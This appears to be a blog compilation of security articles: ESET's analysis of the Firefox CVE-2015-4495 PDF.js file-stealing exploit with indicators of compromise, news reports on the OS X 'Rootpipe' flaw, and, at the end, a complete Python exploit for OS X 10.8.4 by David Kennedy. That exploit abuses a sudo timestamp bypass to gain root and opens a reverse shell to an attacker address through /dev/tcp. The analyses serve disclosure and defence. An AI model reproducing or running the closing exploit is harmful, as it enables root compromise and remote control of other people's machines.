Firefox Under Fire: Anatomy of latest 0-day attack

On the August 6th, the Mozilla Foundation released a security update for the Firefox web browser that fixes the CVE-2015-4495 vulnerability in Firefox’s embedded PDF viewer, PDF.js. This vulnerability allows attackers to bypass the same-origin policy and execute JavaScript remotely that will be interpreted in the local file context. This, in turn, allows attackers to read and write files on local machine as well as upload them to a remote server. The exploit for this vulnerability is being actively used in the wild, so Firefox users are advised to update to the latest version (39.0.3 at the time of writing) immediately.

In this blog we provide an analysis of two versions of the script and share details about the associated attacks against Windows, Linux and OS X systems.

According to ESET’s LiveGrid® telemetry, the server at the IP address 185.86.77.48, which was hosting the malicious script, has been up since July 27, 2015. Also we can find corroboration on one of the compromised forums:

image1

Operatives from the Department on Combating Cybercrime of the Ministry of Internal Affairs of Ukraine, who responded promptly to our notification, have also confirmed that the malicious exfiltration server, hosted in Ukraine, has been online since July 27, 2015.

According to our monitoring of the threat, the server became inactive on August 8, 2015.

 

The script

The script used is not obfuscated and easy to analyze. Nevertheless, the code shows that the attackers had good knowledge of Firefox internals.

The malicious script creates an IFRAME with an empty PDF blob. When Firefox is about to open the PDF blob with the internal PDF viewer (PDF.js), new code is injected into the IFRAME (Figure 2). When this code executes, a new sandboxContext property is created within wrappedJSObject. A JavaScript function is written to the sandboxContext property. This function will later be invoked by subsequent code. Together, these steps lead to the successful bypass of the same-origin policy.

Code that creates sandboxContext property

The exploit is very reliable and works smoothly. However, it may display a warning which can catch the attention of tech-savvy users.

The warning message showed on compromised site

After successful exploitation of the bug, execution passes to the exfiltration part of code. The script supports both the Linux and Windows platforms. On Windows it searches for configuration files belonging to popular FTP clients (such as FileZilla, SmartFTP and others), SVN client, instant messaging clients (Psi+ and Pidgin), and the Amazon S3 client.

The list of collected files on Windows at the first stage of attack

These configuration files may contain saved login and password details.

On the Linux systems, the script sends following files to the remote server:

  • /etc/passwd
  • /etc/hosts
  • /etc/hostname
  • /etc/issue

It also parses the /etc/passwd file in the order to get the home directories (homedir) of users on the system. The script then searches files by mask in the home directories collected, and it avoids searching in the home directories of standard system users (such as daemon, bin, sys, sync and so forth).

The list of collected files on Linux at stage 1 of attack

It collects and uploads such files as:

  • history (bash, MySQL, PostgreSQL)
  • SSH related configuration files and authorization keys
  • Configuration files for remote access software – Remmina
  • FileZilla configuration files
  • PSI+ configuration
  • text files with possible credentials and shell scripts

As is evident here, the purpose of the first version of the malicious script was to gather data used mostly by webmasters and site administrators. This allowed attackers to move on to compromising more websites.

 

The second version

The day after Mozilla released the patch for Firefox the attackers decided to go “all-in”: they registered two new domains and improved their script.

The two new malicious domains were maxcdnn[.]com (93.115.38.136) and acintcdn[.]net (185.86.77.48). The second IP address is the same one as used in the first version. Attackers selected these names because the domains look as if they belong to a content delivery network (CDN).

The improved script on the Windows platform not only collects configuration files for applications; it also collects text files containing almost all combinations of words of possible value to attackers (such as password, accounts, bitcoins, credit cards, exploits, certificates, and so on):

List of files collected on Windows during the second attack stage

The attackers improved the Linux script by adding new files to collect and also developed code that works on the Mac OS X operating system:

List of files collected on Macs during the second stage of an attack

Some Russian-speaking commentators misattributed this code to the Duqu malware, because some variables in the code have the text “dq” in them.

 

A copycat attack

Since the bug is easy to exploit and a working copy of the script is available to cybercriminals, different attackers have started to use it. We have seen that various groups quickly adopted the exploit and started to serve it, mostly on adult sites from google-user-cache[.]com (108.61.205.41)

This malicious script does all the same things as the original script, but it collects different files:

The list of collected files used in copycat attack

 

Conclusion

The recent Firefox attacks are an example of active in-the-wild exploitation of a serious software vulnerability. The exploit shows that the malware-writers had a deep knowledge of Firefox internals. It is also an interesting one, since in most cases, exploits are used as an infection vector for other data-stealing trojans. In this instance, however, that was not necessary, because the malicious script alone was able to steal sensitive files from victims’ systems.

Additionally, the exploit started to be reused by other malware operators shortly after its discovery. This is common practice in the malware world.

ESET detects the malicious scripts as JS/Exploit.CVE-2015-4495. We also urge Firefox users to update their browser to the patched version (39.0.3). The internal Firefox PDF reader can also be disabled by changing the pdfjs.disabled setting to true.

 

Indicators of Compromise

A partial list of compromised servers:

hxxp://www.akipress.org/

hxxp://www.tazabek.kg/

hxxp://www.super.kg/

hxxp://www.rusmmg.ru/

hxxp://forum.cs-cart.com/

hxxp://www.searchengines.ru/

hxxp://forum.nag.ru/

Servers used in attack:

maxcdnn[.]com (93.115.38.136)

acintcdn[.]net (185.86.77.48)

google-user-cache[.]com (108.61.205.41)

Hashes (MD5):

0A19CC67A471A352D76ACDA6327BC179547A7A25

2B1A220D523E46335823E7274093B5D44F262049

19BA06ADF175E2798F17A57FD38A855C83AAE03B

3EC8733AB8EAAEBD01E5379936F7181BCE4886B3

 
 

Credit:  Anton Cherepanov

Critical Mac OS X Yosemite Vulnerability Allows Root Access Without Password

 

A Swedish Security researcher has discovered a critical vulnerability in Apple’s OS X Yosemite that gives hackers the ability to escalate administrative privileges on a compromised machine, and allows them to gain the highest level of access on a machine, known as root access.

 

The vulnerability, dubbed as “Rootpipe“, was uncovered by Swedish white-hat hacker Emil Kvarnhammar, who is holding on the full details about the privilege escalation bug until January 2015, as Apple needs some time to prepare a security patch.

Details on the #rootpipe exploit will be presented, but not now. Let’s just give Apple some time to roll out a patch to affected users,” Emil Kvarnhammar, IT specialist and hacker security company Truesec, tweeted from his twitter account.

By exploiting the vulnerability in the Mac OS X Yosemite, an attacker could bypass the usual safeguard mechanisms which are supposed to stop anyone who tries to root the operating system through a temporary backdoor.

 

 

ROOT ACCESS WITHOUT PASSWORD
Once exploited, hackers could install malicious software or make other changes to your computer without any need of a password.
Hackers could steal victims’ sensitive information such as passwords or bank account information, or if required, they could format the entire affected computer, deleting all your important data from the computer.
Kvarnhammar has also provided a video to explain his initial finding.

It all started when I was preparing for two security events, one in Stockholm and one in Malmö,” Kvarnhammar says. “I wanted to show a flaw in Mac OS X, but relatively few have been published. There are a few ‘proof of concepts’ online, but the latest I found affected the older 10.8.5 version of OS X. I couldn’t find anything similar for 10.9 or 10.10.

Kvarnhammar tested the vulnerability on OS X version 10.8, 10.9 and 10.10. He has confirmed that it has existed since at least 2012, but probably is much older than that.

 

INFORMED APPLE
Kvarnhammar contacted Apple about the issue but he initially didn’t get any response, and Apple silently asked him for more details. When he provided with the details, Apple asked TrueSec not to disclose until next January.

Kvarnhammar said, “The current agreement with Apple is to disclose all details in mid-January 2015. This might sound like a long wait, but hey, time flies. It’s important that they have time to patch, and that the patch is available for some time.

 

HOW TO PROTECT
The full disclosure of the vulnerability would be made public in January, after Apple will provide a fix. Apple Yosemite OS X users are advised to follow the below steps in order to protect yourself from the exploitation of the Rootpipe:
  • Avoid running the system on a daily basis with an admin account. An attacker that will gain control on this account will obtain anyway limited privileges.
  • Use volume encryption Apple’s FileVault tool, which allows encryption and decryption on the fly, protecting your information always.
However, the best way to protect yourself from such security vulnerabilities is to ensure that the operating system running on your system is always up-to-date, and always be careful to the links and documents others send to you.

 
 
 

Credit:  Muhit Kumar, thehackernews

 

Apple OS X Yosemite infested by nasty ‘Rootpipe’ vulnerability

 

A Swedish security researcher has turned up a serious vulnerability in OS X “Yosemite”, but details are to be withheld until January, giving Apple time to prepare a patch.

The vuln was first described in mid-October, when Truesec posted a YouTube video (below) that sketchily described the existence of the bug.


Truesec researcher Emil Kvarnhammar says he discovered a way to get past the user controls on Apple’s terminal shell, to gain access to a shell with root privileges. The vulnerability subverts the password requirements for someone to run sudo – that is, to access the shell as a superuser.

While Kvarnhammar hasn’t told the world whether it’s a purely-local exploit or remotely-exploitable, the advice he gives suggests the latter. First, Apple users should create their day-to-day account (without admin privileges) as a separate user and not run as Administrator for “normal” operations. Second, users should turn on FileVault to encrypt their hard drives.

Kvarnhammar is quoted in Swedish media (for example, here), picked up in English all over the world, as saying he’s tested the bug on OS X 10.8, 10.9 and 10.10. He has confirmed that it has existed since at least 2012, but probably is much older than that.

 

 

Credit:  Richard Chirgwin, theregister

OSX <= 10.8.4 – Local Root Priv Escalation (py)

#!/usr/bin/python
# Original MSF Module:
# https://github.com/rapid7/metasploit-framework/blob/master/modules
# /exploits/osx/local/sudo_password_bypass.rb
########################################################################
# Title: OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell
# Date: 08-27-2013
# Exploit Author: David Kennedy @ TrustedSec
# Website: https://www.trustedsec.com
# Twitter: @Dave_ReL1K
# Tested On: OSX 10.8.4
#
# Reference: http://www.exploit-db.com/exploits/27944/
#
# Example below:
# trustedsec:Desktop Dave$ python osx_esc.py
# [*] Exploit has been performed. You should have a shell on ipaddr:
# 127.0.0.1 and port 4444
# attacker_box:~ Dave$ nc -l 4444
# bash: no job control in this shell
# bash-3.2#
########################################################################
import subprocess
# IPADDR for REVERSE SHELL - change this to your attacker IP address
ipaddr = "192.168.1.1"
# PORT for REVERSE SHELL - change this to your attacker port address
port = "4444"
# drop into a root shell - replace 192.168.1.1 with the reverse listener
proc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE,
stdin=subprocess.PIPE, stderr=subprocess.PIPE)
proc.stdin.write("systemsetup -setusingnetworktime Off -settimezone GMT
-setdate 01:01:1970 -settime 00:00;sudo su\nbash -i >& /dev/tcp/%s/%s
0>&1 &\n" % (ipaddr,port))
print """
########################################################################
#
# OSX < 10.8.4 Local Root Priv Escalation Root Reverse Shell
#
# Written by: David Kennedy @ TrustedSec
# Website: https://www.trustedsec.com
# Twitter: @Dave_ReL1K
#
# Reference: http://www.exploit-db.com/exploits/27944/
########################################################################
"""
print "[*] Exploit has been performed. You should have a shell on ipaddr:
%s and port %s" % (ipaddr,port)